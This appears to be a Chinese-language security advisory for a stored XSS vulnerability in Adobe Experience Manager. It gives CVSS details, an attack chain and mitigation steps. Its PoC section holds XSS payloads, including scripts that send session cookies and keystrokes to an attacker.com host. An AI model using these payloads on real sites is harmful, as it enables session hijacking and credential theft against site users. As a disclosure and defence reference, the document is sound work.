CVE-2025-64804 Adobe Experience Manager存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64804

漏洞类型

存储型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager

漏洞概述

CVE-2025-64804是Adobe Experience Manager中的一个存储型跨站脚本攻击(XSS)漏洞。该漏洞影响Adobe Experience Manager 6.5.23及之前的所有版本。攻击者利用此漏洞可以通过低权限账户向存在漏洞的表单字段中注入恶意JavaScript代码。由于是存储型XSS，恶意脚本会被永久保存在服务器端，当其他用户访问包含该漏洞字段的页面时，恶意代码会在其浏览器中自动执行。这可能导致会话劫持、敏感信息窃取、钓鱼攻击或在受害者浏览器中执行任意操作。漏洞的CVSS评分为5.4，属于中等严重程度，需要网络攻击、低权限认证和用户交互才能利用成功。Adobe官方已于2025年12月10日发布安全公告(APSB25-115)确认此漏洞并提供修复版本。

技术细节

Adobe Experience Manager的存储型XSS漏洞源于对用户输入的表单字段缺乏充分的输入验证和输出编码。当低权限用户向特定表单字段提交数据时，系统未能正确过滤或转义HTML/JavaScript特殊字符，导致恶意脚本内容被直接存储在服务器数据库中。其他用户访问包含该字段的页面时，服务器将未经过滤的内容直接返回给客户端浏览器，浏览器将其作为合法HTML/JS解析执行。攻击者可以利用此漏洞窃取受害者的会话Cookie、伪造用户操作、植入钓鱼页面或进一步进行横向移动。攻击成功的关键条件包括：攻击者需拥有Adobe Experience Manager的低权限账户，能够访问存在漏洞的表单字段，且需要诱导其他用户访问包含恶意内容的页面。该漏洞的CVSS向量为CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N，表明攻击复杂度低，但影响范围限于机密性和完整性。

攻击链分析

STEP 1

1. 信息收集

攻击者识别Adobe Experience Manager实例并确认版本号，确定是否存在CVE-2025-64804漏洞（6.5.23及之前版本）

STEP 2

2. 获取低权限账户

攻击者获取Adobe Experience Manager的低权限用户账户，该账户具有访问和提交表单数据的权限

STEP 3

3. 注入恶意脚本

攻击者向存在漏洞的表单字段提交包含恶意JavaScript代码的 payload，如<script>alert(document.cookie)</script>

STEP 4

4. 脚本存储

恶意脚本被永久存储在服务器端数据库中，位于表单字段的提交数据里

STEP 5

5. 诱导受害者访问

攻击者诱导具有高权限的受害者访问包含恶意脚本的页面（如管理员或内容审核者）

STEP 6

6. 脚本执行

当受害者访问该页面时，未经过滤的恶意JavaScript在其浏览器中自动执行，导致会话劫持、信息窃取等危害

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-64804 PoC - Stored XSS in Adobe Experience Manager -->
<!-- This PoC demonstrates injecting malicious JavaScript into form fields -->

<!-- Step 1: Identify vulnerable form field -->
<!-- Navigate to a form in Adobe Experience Manager where low-privilege users can submit data -->

<!-- Step 2: Inject XSS payload into the form field -->
<form action="https://vulnerable-site.com/content/forms/af/submit" method="POST">
  <input type="text" name="vulnerable_field" value='
    "><script>alert(document.cookie)</script>
  ' />
  <button type="submit">Submit</button>
</form>

<!-- Alternative payload - Session Hijacking -->
<script>
  // Steal session cookies
  var cookies = document.cookie;
  var img = new Image();
  img.src = "https://attacker.com/log?cookie=" + encodeURIComponent(cookies);
</script>

<!-- Alternative payload - Keylogger -->
<script>
  document.addEventListener("keypress", function(e) {
    fetch("https://attacker.com/log?key=" + e.key);
  });
</script>

<!-- Step 3: Wait for victim to access the page containing the malicious script -->
<!-- When victim visits the page, the script executes in their browser context -->

影响范围

Adobe Experience Manager <= 6.5.23

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1) 限制低权限用户对表单字段的访问权限；2) 启用WAF(Web应用防火墙)规则检测和阻止XSS攻击特征；3) 对所有表单输入实施严格的输入验证；4) 部署Content Security Policy(CSP)响应头限制脚本执行；5) 监控日志中的异常脚本标签和事件；6) 对管理员和内容编辑者进行安全意识培训，提醒勿点击可疑链接；7) 考虑暂时禁用非必要表单功能直到完成修复。